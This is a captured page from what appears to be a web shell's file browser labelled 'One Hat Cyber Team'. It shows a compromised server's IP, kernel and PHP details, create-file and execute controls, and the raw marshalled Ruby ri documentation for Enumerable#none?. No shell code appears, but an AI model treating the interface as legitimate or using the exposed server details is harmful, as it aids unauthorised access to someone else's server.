⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
ri
/
3.0.0
/
system
/
Enumerable
/
View File Name :
none%3f-i.ri
U:RDoc::AnyMethod[iI" none?:ETI"Enumerable#none?;TF:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [ I"JPasses each element of the collection to the given block. The method ;TI"Lreturns
true
if the block never returns
true
;TI"Qfor all elements. If the block is not given,
none?
will return ;TI"F
true
only if none of the collection members is true.;To:RDoc::Markup::BlankLine o; ; [I"BIf instead a pattern is supplied, the method returns whether ;TI"I
pattern === element
for none of the collection members.;T@o:RDoc::Markup::Verbatim; [ I"A%w{ant bear cat}.none? { |word| word.length == 5 } #=> true ;TI"B%w{ant bear cat}.none? { |word| word.length >= 4 } #=> false ;TI"A%w{ant bear cat}.none?(/d/) #=> true ;TI"B[1, 3.14, 42].none?(Float) #=> false ;TI"A[].none? #=> true ;TI"A[nil].none? #=> true ;TI"A[nil, false].none? #=> true ;TI"A[nil, false, true].none? #=> false;T:@format0: @fileI"enum.c;T:0@omit_headings_from_table_of_contents_below0I"eenum.none? [{ |obj| block }] -> true or false enum.none?(pattern) -> true or false ;T0[ I"(*args);T@ FI"Enumerable;TcRDoc::NormalModule00